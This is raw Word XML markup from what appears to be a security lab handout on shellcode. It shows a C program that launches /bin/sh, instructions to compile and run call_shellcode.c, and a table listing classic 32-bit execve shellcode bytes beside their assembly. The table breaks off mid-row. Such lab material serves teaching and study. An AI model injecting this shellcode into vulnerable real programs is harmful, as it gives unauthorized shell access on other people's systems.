        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="552"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>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name[2];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="261" w:lineRule="auto" w:before="94"/>
        <w:ind w:left="552" w:right="5736"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>name[0] = ‘‘/bin/sh’’;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>name[1] = NULL;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>execve(name[0],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>name,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>NULL);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="247" w:lineRule="exact"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="498"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>shellcode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just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assembly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>version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above</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>program.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="46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9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>program</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="256" w:lineRule="auto" w:before="18"/>
        <w:ind w:left="160" w:right="430"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>shows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>how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launch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shell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/>
        <w:t>executing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shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>stored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buffer.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="51"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Please</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>compile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run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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code,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whether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shell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invoked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-9"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>call_shellcode.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="117"/>
        </w:rPr>
        <w:t>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/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="225" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="160" w:right="756"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>/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A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>program</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>that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creates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a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>file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containing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>code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9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>launching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shell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/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-129"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>#include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&lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="261" w:lineRule="auto" w:before="25"/>
        <w:ind w:left="160" w:right="7306"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-130"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>#include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&lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3" w:after="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="2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1"/>
        <w:gridCol w:w="327"/>
        <w:gridCol w:w="458"/>
        <w:gridCol w:w="654"/>
        <w:gridCol w:w="458"/>
        <w:gridCol w:w="982"/>
        <w:gridCol w:w="2422"/>
        <w:gridCol w:w="1097"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="249" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341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const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char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code[]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="327" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="230" w:lineRule="exact"/>
              <w:ind w:left="65"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:w w:val="99"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6071" w:type="dxa"/>
            <w:gridSpan w:val="6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2341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="15"/>
              <w:ind w:left="311"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>"\x31\xc0"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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spacing w:line="255" w:lineRule="exact" w:before="15"/>
              <w:ind w:right="63"/>
              <w:jc w:val="righ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position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="15"/>
              <w:ind w:left="42" w:right="41"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="458" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="15"/>
              <w:ind w:left="66"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="15"/>
              <w:ind w:left="132"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>xorl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2422" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="15"/>
              <w:ind w:left="197"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>%eax,%eax</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1097" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="255" w:lineRule="exact" w:before="15"/>
              <w:ind w:right="47"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="270" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="311"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>"\x50"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="63"/>
              <w:jc w:val="righ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position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="42" w:right="41"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="458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2:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982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pushl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2422" w:type="dxa"/>
          </w:tcPr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sz w:val="22"/>
              </w:rPr>
              <w:t>%eax</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1097" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="47"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="270" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="311"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>"\x68""//sh"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="63"/>
              <w:jc w:val="righ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position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="42" w:right="41"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="458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3:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982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pushl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2422" w:type="dxa"/>
          </w:tcPr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sz w:val="22"/>
              </w:rPr>
              <w:t>$0x68732f2f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1097" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="47"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="270" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="311"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>"\x68""/bin"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="63"/>
              <w:jc w:val="righ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position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="42" w:right="41"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="458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4:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982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pushl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2422" w:type="dxa"/>
          </w:tcPr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sz w:val="22"/>
              </w:rPr>
              <w:t>$0x6e69622f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1097" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="47"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="270" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="311"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>"\x89\xe3"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="63"/>
              <w:jc w:val="righ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position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="42" w:right="41"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="458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5:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982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movl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2422" w:type="dxa"/>
          </w:tcPr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sz w:val="22"/>
              </w:rPr>
              <w:t>%esp,%ebx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1097" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="47"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="270" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="311"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>"\x50"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="63"/>
              <w:jc w:val="righ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position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="42" w:right="41"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="458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6:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982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pushl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2422" w:type="dxa"/>
          </w:tcPr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sz w:val="22"/>
              </w:rPr>
              <w:t>%eax</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1097" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="47"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="268" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="311"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>"\x53"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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spacing w:line="249" w:lineRule="exact"/>
              <w:ind w:right="63"/>
              <w:jc w:val="righ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position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="42" w:right="41"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="458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7:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982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pushl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2422" w:type="dxa"/>
          </w:tcPr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sz w:val="22"/>
